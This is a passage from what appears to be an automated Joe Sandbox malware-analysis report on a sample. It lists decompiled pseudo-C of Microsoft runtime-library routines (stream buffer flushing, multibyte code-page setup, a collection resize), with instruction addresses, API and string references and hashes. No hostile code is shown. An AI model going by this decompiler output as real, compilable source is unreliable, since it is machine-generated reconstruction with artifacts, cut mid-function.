								 *((intOrPtr*)(_v28 + 4)) = 0;
								_t55 = _v28;
							} else {
								_t55 = 0;
							}
							goto L28;
						}
						goto L24;
					}
					_t55 = 0;
					goto L28;
				}
				_t55 = 0;
				goto L28;
			}


























                      0x00946e40
                      0x00946e48
                      0x00946e56
                      0x00946e56
                      0x00946e58
                      0x00946e59
                      0x00946e5c
                      0x00946e60
                      0x00946e6b
                      0x00946e62
                      0x00946e62
                      0x00946e62
                      0x00946e75
                      0x00946e78
                      0x00946e7c
                      0x00946e93
                      0x00946e98
                      0x00946e9e
                      0x00946ea0
                      0x00946ea0
                      0x00946e9e
                      0x00946ea5
                      0x00946ea7
                      0x00946fbe
                      0x00946fbe
                      0x00946fc8
                      0x00946fcd
                      0x00946fde
                      0x00946fde
                      0x00946eae
                      0x00946eae
                      0x00946eae
                      0x00946ebc
                      0x00946ec1
                      0x00946ec4
                      0x00946ec6
                      0x00946ed1
                      0x00946eda
                      0x00946edd
                      0x00946ee0
                      0x00946ee3
                      0x00946eee
                      0x00946ee5
                      0x00946ee5
                      0x00946ee5
                      0x00946ef8
                      0x00946efb
                      0x00946eff
                      0x00946f16
                      0x00946f1b
                      0x00946f1e
                      0x00946f21
                      0x00946f23
                      0x00946f23
                      0x00946f21
                      0x00946f24
                      0x00946f28
                      0x00000000
                      0x00000000
                      0x00946f31
                      0x00946f33
                      0x00000000
                      0x00000000
                      0x00946f39
                      0x00946f41
                      0x00946f46
                      0x00946f49
                      0x00946f4b
                      0x00946f63
                      0x00946f63
                      0x00000000
                      0x00946f63
                      0x00946f53
                      0x00946f57
                      0x00946f5c
                      0x00946f5f
                      0x00946f61
                      0x00946f76
                      0x00946f7d
                      0x00946f7f
                      0x00946f86
                      0x00946f89
                      0x00946f8d
                      0x00946f99
                      0x00946f9e
                      0x00946fa8
                      0x00946fa8
                      0x00946fab
                      0x00946fae
                      0x00946fb4
                      0x00946fbb
                      0x00946f8f
                      0x00946f8f
                      0x00946f8f
                      0x00000000
                      0x00946f8d
                      0x00000000
                      0x00946f61
                      0x00946f2a
                      0x00000000
                      0x00946f2a
                      0x00946ec8
                      0x00000000

                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00946FC8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlstr.h$__atl_condVal
                      • API String ID: 930174750-415448663
                      • Opcode ID: cae18c11cf10daccfbfe846f9f435df1ddb7cb7bf08751e123acac75f4e7716e
                      • Instruction ID: 2948fccbc442c6a1bc9f6975ab7f17d8341f05c0d3e1facf89a0f2d9d1d1dda5
                      • Opcode Fuzzy Hash: cae18c11cf10daccfbfe846f9f435df1ddb7cb7bf08751e123acac75f4e7716e
                      • Instruction Fuzzy Hash: D051E5B5E10208AFDB00DF94E886FEFBBF4AB89744F108558F901AB381D771D9948B91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009BC9F0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 137COMMON
                      Download Yara Rule
                      C-Code - Quality: 97%
                      			E009BC9F0(char _a4, char _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				signed int _t55;
				void* _t59;
				intOrPtr* _t61;
				void* _t62;
				intOrPtr* _t63;
				void* _t65;
				void* _t67;
				void* _t82;
				signed int _t106;
				void* _t119;
				void* _t120;

				_t55 = E009A8780(E0097C080( &_a8));
				_t120 = _t119 + 4;
				_v8 = _t55;
				if((E009BCD50( &_a8) & 0x000000ff) == 0) {
					_t59 = E009C46A0(_v8, _v8,  &_a4, 1);
					__eflags = _t59 - 1;
					if(_t59 != 1) {
						_v28 = 0;
					} else {
						_v28 = 1;
					}
					return _v28;
				}
				_t61 = E00977320( &_a8);
				_t62 = E00977320( &_a8);
				_t125 =  *_t61 -  *((intOrPtr*)(_t62 + 4));
				if( *_t61 -  *((intOrPtr*)(_t62 + 4)) < 0) {
					_t82 = L00994930(_t125, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\_flsbuf.cpp", 0x41, 0, L"%ls", L"(\"inconsistent IOB fields\", stream->_ptr - stream->_base >= 0)");
					_t120 = _t120 + 0x18;
					if(_t82 == 1) {
						asm("int3");
					}
				}
				_t63 = E00977320( &_a8);
				_v12 =  *_t63 -  *((intOrPtr*)(E00977320( &_a8) + 4));
				_t65 = E00977320( &_a8);
				 *((intOrPtr*)(E00977320( &_a8))) =  *((intOrPtr*)(_t65 + 4)) + 1;
				_t67 = E00977320( &_a8);
				 *((intOrPtr*)(E00977320( &_a8) + 8)) =  *((intOrPtr*)(_t67 + 0x18)) - 1;
				_v20 = 0;
				if(_v12 <= 0) {
					__eflags = _v8 - 0xffffffff;
					if(_v8 == 0xffffffff) {
						L9:
						_v16 = 0xa061f0;
						L10:
						_t106 = _v16;
						_t34 = _t106 + 0x28; // 0xa0a0080
						__eflags =  *_t34 & 0x20;
						if(( *_t34 & 0x20) == 0) {
							goto L13;
						}
						_v36 = E009C54F0(_v8, 0, 0, 2);
						_v32 = _t106;
						__eflags = (_v36 & _v32) - 0xffffffff;
						if((_v36 & _v32) != 0xffffffff) {
							goto L13;
						}
						E009A9080( &_a8, 0x10);
						return 1;
					}
					__eflags = _v8 - 0xfffffffe;
					if(_v8 == 0xfffffffe) {
						goto L9;
					}
					_v16 = (_v8 & 0x0000003f) * 0x38 +  *((intOrPtr*)(0xb31198 + (_v8 >> 6) * 4));
					goto L10;
				} else {
					_v20 = E009C46A0(_v8, _v8,  *((intOrPtr*)(E00977320( &_a8) + 4)), _v12);
					L13:
					 *((char*)( *((intOrPtr*)(E00977320( &_a8) + 4)))) = _a4;
					if(_v20 != _v12) {
						_v24 = 0;
					} else {
						_v24 = 1;
					}
					return _v24;
				}
			}






















                      0x009bca02
                      0x009bca07
                      0x009bca0a
                      0x009bca1a
                      0x009bcb79
                      0x009bcb81
                      0x009bcb84
                      0x009bcb8f
                      0x009bcb86
                      0x009bcb86
                      0x009bcb86
                      0x00000000
                      0x009bcb96
                      0x009bca23
                      0x009bca2d
                      0x009bca34
                      0x009bca37
                      0x009bca4e
                      0x009bca53
                      0x009bca59
                      0x009bca5b
                      0x009bca5b
                      0x009bca59
                      0x009bca5f
                      0x009bca73
                      0x009bca79
                      0x009bca8c
                      0x009bca91
                      0x009bcaa4
                      0x009bcaa7
                      0x009bcab2
                      0x009bcad5
                      0x009bcad9
                      0x009bcafc
                      0x009bcafc
                      0x009bcb03
                      0x009bcb03
                      0x009bcb06
                      0x009bcb0a
                      0x009bcb0d
                      0x00000000
                      0x00000000
                      0x009bcb21
                      0x009bcb24
                      0x009bcb2d
                      0x009bcb30
                      0x00000000
                      0x00000000
                      0x009bcb37
                      0x00000000
                      0x009bcb3c
                      0x009bcadb
                      0x009bcadf
                      0x00000000
                      0x00000000
                      0x009bcaf7
                      0x00000000
                      0x009bcab4
                      0x009bcad0
                      0x009bcb40
                      0x009bcb4e
                      0x009bcb56
                      0x009bcb61
                      0x009bcb58
                      0x009bcb58
                      0x009bcb58
                      0x00000000
                      0x009bcb68

                      APIs
                        • Part of subcall function 009A8780: std::_Timevec::_Timevec.LIBCPMTD ref: 009A878F
                      • __wcstombs_l.LIBCMTD ref: 009BCB19
                      Strings
                      • minkernel\crts\ucrt\src\appcrt\stdio\_flsbuf.cpp, xrefs: 009BCA47
                      • %ls, xrefs: 009BCA3E
                      • ("inconsistent IOB fields", stream->_ptr - stream->_base >= 0), xrefs: 009BCA39
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: TimevecTimevec::___wcstombs_lstd::_
                      • String ID: %ls$("inconsistent IOB fields", stream->_ptr - stream->_base >= 0)$minkernel\crts\ucrt\src\appcrt\stdio\_flsbuf.cpp
                      • API String ID: 2681442900-3128027998
                      • Opcode ID: 98901eb945b6479e8aed918584bd7b51ca1baf63c9571893da433f5f66f0e29e
                      • Instruction ID: b96c0fbb8134123ccb18a421d5eefdd3de1a5cb7c3025a1699b165b49391f79d
                      • Opcode Fuzzy Hash: 98901eb945b6479e8aed918584bd7b51ca1baf63c9571893da433f5f66f0e29e
                      • Instruction Fuzzy Hash: C551A4B1D00118ABCB14DFA4E956BEEB774AF40320F24C259E81A6F291D770EA44CBC0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009BCBA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 137COMMON
                      Download Yara Rule
                      C-Code - Quality: 97%
                      			E009BCBA0(void* _a4, char _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				signed int _t55;
				void* _t59;
				intOrPtr* _t61;
				void* _t62;
				intOrPtr* _t63;
				void* _t65;
				void* _t67;
				void* _t82;
				signed int _t106;
				void* _t119;
				void* _t120;

				_t55 = E009A8780(E0097C080( &_a8));
				_t120 = _t119 + 4;
				_v8 = _t55;
				if((E009BCD50( &_a8) & 0x000000ff) == 0) {
					_t59 = E009C46A0(_v8, _v8,  &_a4, 2);
					__eflags = _t59 - 2;
					if(_t59 != 2) {
						_v28 = 0;
					} else {
						_v28 = 1;
					}
					return _v28;
				}
				_t61 = E00977320( &_a8);
				_t62 = E00977320( &_a8);
				_t125 =  *_t61 -  *((intOrPtr*)(_t62 + 4));
				if( *_t61 -  *((intOrPtr*)(_t62 + 4)) < 0) {
					_t82 = L00994930(_t125, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\_flsbuf.cpp", 0x41, 0, L"%ls", L"(\"inconsistent IOB fields\", stream->_ptr - stream->_base >= 0)");
					_t120 = _t120 + 0x18;
					if(_t82 == 1) {
						asm("int3");
					}
				}
				_t63 = E00977320( &_a8);
				_v12 =  *_t63 -  *((intOrPtr*)(E00977320( &_a8) + 4));
				_t65 = E00977320( &_a8);
				 *((intOrPtr*)(E00977320( &_a8))) =  *((intOrPtr*)(_t65 + 4)) + 2;
				_t67 = E00977320( &_a8);
				 *((intOrPtr*)(E00977320( &_a8) + 8)) =  *((intOrPtr*)(_t67 + 0x18)) - 2;
				_v20 = 0;
				if(_v12 <= 0) {
					__eflags = _v8 - 0xffffffff;
					if(_v8 == 0xffffffff) {
						L9:
						_v16 = 0xa061f0;
						L10:
						_t106 = _v16;
						_t34 = _t106 + 0x28; // 0xa0a0080
						__eflags =  *_t34 & 0x20;
						if(( *_t34 & 0x20) == 0) {
							goto L13;
						}
						_v36 = E009C54F0(_v8, 0, 0, 2);
						_v32 = _t106;
						__eflags = (_v36 & _v32) - 0xffffffff;
						if((_v36 & _v32) != 0xffffffff) {
							goto L13;
						}
						E009A9080( &_a8, 0x10);
						return 1;
					}
					__eflags = _v8 - 0xfffffffe;
					if(_v8 == 0xfffffffe) {
						goto L9;
					}
					_v16 = (_v8 & 0x0000003f) * 0x38 +  *((intOrPtr*)(0xb31198 + (_v8 >> 6) * 4));
					goto L10;
				} else {
					_v20 = E009C46A0(_v8, _v8,  *((intOrPtr*)(E00977320( &_a8) + 4)), _v12);
					L13:
					 *((short*)( *((intOrPtr*)(E00977320( &_a8) + 4)))) = _a4;
					if(_v20 != _v12) {
						_v24 = 0;
					} else {
						_v24 = 1;
					}
					return _v24;
				}
			}






















                      0x009bcbb2
                      0x009bcbb7
                      0x009bcbba
                      0x009bcbca
                      0x009bcd2b
                      0x009bcd33
                      0x009bcd36
                      0x009bcd41
                      0x009bcd38
                      0x009bcd38
                      0x009bcd38
                      0x00000000
                      0x009bcd48
                      0x009bcbd3
                      0x009bcbdd
                      0x009bcbe4
                      0x009bcbe7
                      0x009bcbfe
                      0x009bcc03
                      0x009bcc09
                      0x009bcc0b
                      0x009bcc0b
                      0x009bcc09
                      0x009bcc0f
                      0x009bcc23
                      0x009bcc29
                      0x009bcc3c
                      0x009bcc41
                      0x009bcc54
                      0x009bcc57
                      0x009bcc62
                      0x009bcc85
                      0x009bcc89
                      0x009bccac
                      0x009bccac
                      0x009bccb3
                      0x009bccb3
                      0x009bccb6
                      0x009bccba
                      0x009bccbd
                      0x00000000
                      0x00000000
                      0x009bccd1
                      0x009bccd4
                      0x009bccdd
                      0x009bcce0
                      0x00000000
                      0x00000000
                      0x009bcce7
                      0x00000000
                      0x009bccec
                      0x009bcc8b
                      0x009bcc8f
                      0x00000000
                      0x00000000
                      0x009bcca7
                      0x00000000
                      0x009bcc64
                      0x009bcc80
                      0x009bccf0
                      0x009bccff
                      0x009bcd08
                      0x009bcd13
                      0x009bcd0a
                      0x009bcd0a
                      0x009bcd0a
                      0x00000000
                      0x009bcd1a

                      APIs
                        • Part of subcall function 009A8780: std::_Timevec::_Timevec.LIBCPMTD ref: 009A878F
                      • __wcstombs_l.LIBCMTD ref: 009BCCC9
                      Strings
                      • minkernel\crts\ucrt\src\appcrt\stdio\_flsbuf.cpp, xrefs: 009BCBF7
                      • %ls, xrefs: 009BCBEE
                      • ("inconsistent IOB fields", stream->_ptr - stream->_base >= 0), xrefs: 009BCBE9
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: TimevecTimevec::___wcstombs_lstd::_
                      • String ID: %ls$("inconsistent IOB fields", stream->_ptr - stream->_base >= 0)$minkernel\crts\ucrt\src\appcrt\stdio\_flsbuf.cpp
                      • API String ID: 2681442900-3128027998
                      • Opcode ID: 0784a933350e24461459e28134fafe64a8fa5335326996831ec113f1ded3aab5
                      • Instruction ID: a81d602521327100abca00b734ae10276ff15c0afe05140f44fd82e849b96ac1
                      • Opcode Fuzzy Hash: 0784a933350e24461459e28134fafe64a8fa5335326996831ec113f1ded3aab5
                      • Instruction Fuzzy Hash: 0C5196B1D00108EBCB14DF94E956BEEBB74AF90320F24C659E85A6F2D1D770AA44DBC0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009AF960 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135timeCOMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 97%
                      			E009AF960(void* __ebx, void* __eflags, intOrPtr _a4, signed int _a8, char _a12, void* _a16) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v40;
				void* __edi;
				void* __esi;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t64;
				signed int _t65;
				signed int _t104;
				char _t117;
				void* _t125;
				void* _t127;
				void* _t129;
				void* _t130;
				void* _t132;
				void* _t134;

				_t134 = __eflags;
				E009AFB20(_a12, _a16);
				_t54 = E009AF410(__ebx, _t125, _t134, _a4);
				_t129 = _t127 + 0xc;
				_v16 = _t54;
				if(_v16 !=  *((intOrPtr*)( *(_a12 + 0x48) + 4))) {
					_t56 = E00999580(0x220, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\mbstring\\mbctype.cpp", 0x19a);
					_t130 = _t129 + 0x10;
					E0099E560( &_v8, _t56);
					__eflags = E0099E620( &_v8) & 0x000000ff;
					if(__eflags != 0) {
						memcpy(E0099EAE0( &_v8),  *(_a12 + 0x48), 0x88 << 2);
						 *(E0099EAE0( &_v8)) = 0;
						_t64 = E009AFE00(__ebx,  &_v8, _v16,  *(_a12 + 0x48) + 0x110, __eflags, _v16, E0099EAE0( &_v8));
						_t132 = _t130 + 0x14;
						_v12 = _t64;
						__eflags = _v12 - 0xffffffff;
						if(_v12 != 0xffffffff) {
							_t65 = _a8 & 0x000000ff;
							__eflags = _t65;
							if(_t65 == 0) {
								_t65 = E0099ECE0();
							}
							asm("lock xadd [edx], eax");
							__eflags = (_t65 | 0xffffffff) == 1;
							if((_t65 | 0xffffffff) == 1) {
								__eflags =  *(_a12 + 0x48) - 0xa06548;
								if(__eflags != 0) {
									L00999480(__eflags,  *(_a12 + 0x48), 2);
									_t132 = _t132 + 8;
								}
							}
							 *(E0099EAE0( &_v8)) = 1;
							 *(_a12 + 0x48) = E0099EA70( &_v8);
							_t117 = _a12;
							__eflags =  *(_t117 + 0x350) & 0x00000002;
							if(( *(_t117 + 0x350) & 0x00000002) != 0) {
								L13:
								_v28 = _v12;
								E0099E5C0( &_v8);
								return _v28;
							} else {
								_t104 =  *0xa067cc; // 0xfffffffe
								__eflags = _t104 & 0x00000001;
								if(__eflags == 0) {
									E009AF0F0(__eflags, 5, E009AF1D0( &_v40,  &_a12,  &_a16));
									__eflags = _a8 & 0x000000ff;
									if((_a8 & 0x000000ff) != 0) {
										 *0xa061e4 =  *_a16;
									}
									_v32 = _v12;
									E0099E5C0( &_v8);
									return _v32;
								}
								goto L13;
							}
						}
						 *((intOrPtr*)(L00992F70( &_v8))) = 0x16;
						_v24 = 0xffffffff;
						E0099E5C0( &_v8);
						return _v24;
					}
					_v20 = 0xffffffff;
					E0099E5C0( &_v8);
					return _v20;
				}
				return 0;
			}

























                      0x009af960
                      0x009af972
                      0x009af97e
                      0x009af983
                      0x009af986
                      0x009af995
                      0x009af9af
                      0x009af9b4
                      0x009af9bb
                      0x009af9cb
                      0x009af9cd
                      0x009af9fb
                      0x009afa05
                      0x009afa18
                      0x009afa1d
                      0x009afa20
                      0x009afa23
                      0x009afa27
                      0x009afa4b
                      0x009afa4f
                      0x009afa51
                      0x009afa53
                      0x009afa53
                      0x009afa61
                      0x009afa65
                      0x009afa66
                      0x009afa6b
                      0x009afa72
                      0x009afa7d
                      0x009afa82
                      0x009afa82
                      0x009afa72
                      0x009afa8d
                      0x009afa9e
                      0x009afaa1
                      0x009afaaa
                      0x009afaad
                      0x009afaba
                      0x009afabd
                      0x009afac3
                      0x00000000
                      0x009afaaf
                      0x009afaaf
                      0x009afab5
                      0x009afab8
                      0x009afae0
                      0x009afaec
                      0x009afaee
                      0x009afaf5
                      0x009afaf5
                      0x009afafe
                      0x009afb04
                      0x00000000
                      0x009afb09
                      0x00000000
                      0x009afab8
                      0x009afaad
                      0x009afa2e
                      0x009afa34
                      0x009afa3e
                      0x00000000
                      0x009afa43
                      0x009af9cf
                      0x009af9d9
                      0x00000000
                      0x009af9de
                      0x00000000

                      APIs
                        • Part of subcall function 009AF410: GetOEMCP.KERNEL32(00000000), ref: 009AF445
                      • __wcstombs_l.LIBCMTD ref: 009AF9AF
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 009AF9BB
                      Strings
                      • minkernel\crts\ucrt\src\appcrt\mbstring\mbctype.cpp, xrefs: 009AF9A3
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: TimevecTimevec::___wcstombs_lstd::_
                      • String ID: minkernel\crts\ucrt\src\appcrt\mbstring\mbctype.cpp
                      • API String ID: 2681442900-426720447
                      • Opcode ID: f307216fd27aba38e1bd63e4f632f5beb60a69ccafc32536078f49e7df530cc8
                      • Instruction ID: 057d6f5bbbcb593959ff42c9a2115977639c875d39ff82b21a71c77fd377a43c
                      • Opcode Fuzzy Hash: f307216fd27aba38e1bd63e4f632f5beb60a69ccafc32536078f49e7df530cc8
                      • Instruction Fuzzy Hash: 2C516371900209EBCF04EF98D8A2AEF7775BF95314F204568F4159B291EB31AE05CBE0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0094E0B0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 107COMMON
                      Download Yara Rule
                      C-Code - Quality: 72%
                      			E0094E0B0(void* __ebx, signed int* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t56;
				signed int _t57;
				void* _t60;
				signed int _t64;
				void* _t69;
				signed int _t89;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;

				_t93 = __esi;
				_t92 = __edi;
				_t69 = __ebx;
				_v28 = 0xcccccccc;
				_v24 = 0xcccccccc;
				_v20 = 0xcccccccc;
				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				if(_v8[1] != _v8[2]) {
					L22:
					E0094FD00(_v8, _v8[1], _a4);
					_t56 = _v8[1] + 1;
					__eflags = _t56;
					_v8[1] = _t56;
					_t57 = 1;
					L23:
					return E009D1520(_t57, _t94 - _t95 + 0x18);
				} else {
					goto L1;
				}
				do {
					L1:
					if(_a4 <  *_v8 || _a4 >=  *_v8 + _v8[2]) {
						_v24 = 1;
					} else {
						_v24 = 0;
					}
					_v12 = _v24;
					do {
						_t100 = _v12;
						if(_v12 == 0) {
							_t60 = L00994930(_t100, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlsimpcoll.h", 0xac, 0, "%ls", L"__atl_condVal");
							_t95 = _t95 + 0x18;
							if(_t60 == 1) {
								asm("int3");
							}
						}
					} while (0 != 0);
					_t103 = _v12;
					if(_v12 == 0) {
						E00942500(_t69, _t92, _t93, _t103, 0x80004005);
					}
				} while (0 != 0);
				if(_v8[2] != 0) {
					_t89 = _v8[1] << 1;
					__eflags = _t89;
					_v28 = _t89;
				} else {
					_v28 = 1;
				}
				_v20 = _v28;
				if(_v20 < 0 || _v20 > 0x7fffffff) {
					_t57 = 0;
				} else {
					_t64 = E00992210( *_v8, _v20, 1);
					_t95 = _t95 + 0xc;
					_v16 = _t64;
					__eflags = _v16;
					if(__eflags != 0) {
						_v8[2] = _v20;
						 *_v8 = _v16;
						goto L22;
					}
					_t57 = 0;
				}
			}



















                      0x0094e0b0
                      0x0094e0b0
                      0x0094e0b0
                      0x0094e0bb
                      0x0094e0be
                      0x0094e0c1
                      0x0094e0c4
                      0x0094e0c7
                      0x0094e0ca
                      0x0094e0cd
                      0x0094e0dc
                      0x0094e1be
                      0x0094e1cc
                      0x0094e1d7
                      0x0094e1d7
                      0x0094e1dd
                      0x0094e1e0
                      0x0094e1e5
                      0x0094e1f2
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0094e0e2
                      0x0094e0e2
                      0x0094e0ea
                      0x0094e105
                      0x0094e0fc
                      0x0094e0fc
                      0x0094e0fc
                      0x0094e10f
                      0x0094e112
                      0x0094e112
                      0x0094e116
                      0x0094e130
                      0x0094e135
                      0x0094e13b
                      0x0094e13d
                      0x0094e13d
                      0x0094e13b
                      0x0094e13e
                      0x0094e142
                      0x0094e146
                      0x0094e14d
                      0x0094e14d
                      0x0094e152
                      0x0094e15d
                      0x0094e16e
                      0x0094e16e
                      0x0094e170
                      0x0094e15f
                      0x0094e15f
                      0x0094e15f
                      0x0094e176
                      0x0094e17d
                      0x0094e188
                      0x0094e18c
                      0x0094e198
                      0x0094e19d
                      0x0094e1a0
                      0x0094e1a3
                      0x0094e1a7
                      0x0094e1b3
                      0x0094e1bc
                      0x00000000
                      0x0094e1bc
                      0x0094e1a9
                      0x0094e1a9

                      APIs
                      Strings
                      • %ls, xrefs: 0094E11D
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlsimpcoll.h, xrefs: 0094E129
                      • __atl_condVal, xrefs: 0094E118
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: __wdupenv_s
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlsimpcoll.h$__atl_condVal
                      • API String ID: 2478291497-1071720693
                      • Opcode ID: aec46dad4ca8b1b2375a269fc24e6e24c8d0b154e16a51f4cb7ec997e3d21667
                      • Instruction ID: 388019e2e9e8fb7c003f3b49a1ae8f86f83b10bab54cdeecd06d1b4c6616fede
                      • Opcode Fuzzy Hash: aec46dad4ca8b1b2375a269fc24e6e24c8d0b154e16a51f4cb7ec997e3d21667
                      • Instruction Fuzzy Hash: 32411B74E44209EFDB14DF98C985FADB7B5BF88304F2081A9E515A7381D7719E80DB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00947E70 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 103COMMON
                      Download Yara Rule
                      C-Code - Quality: 75%
                      			E00947E70(void* __ecx, intOrPtr* __edx, void* __edi, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v20;
				signed int _v32;
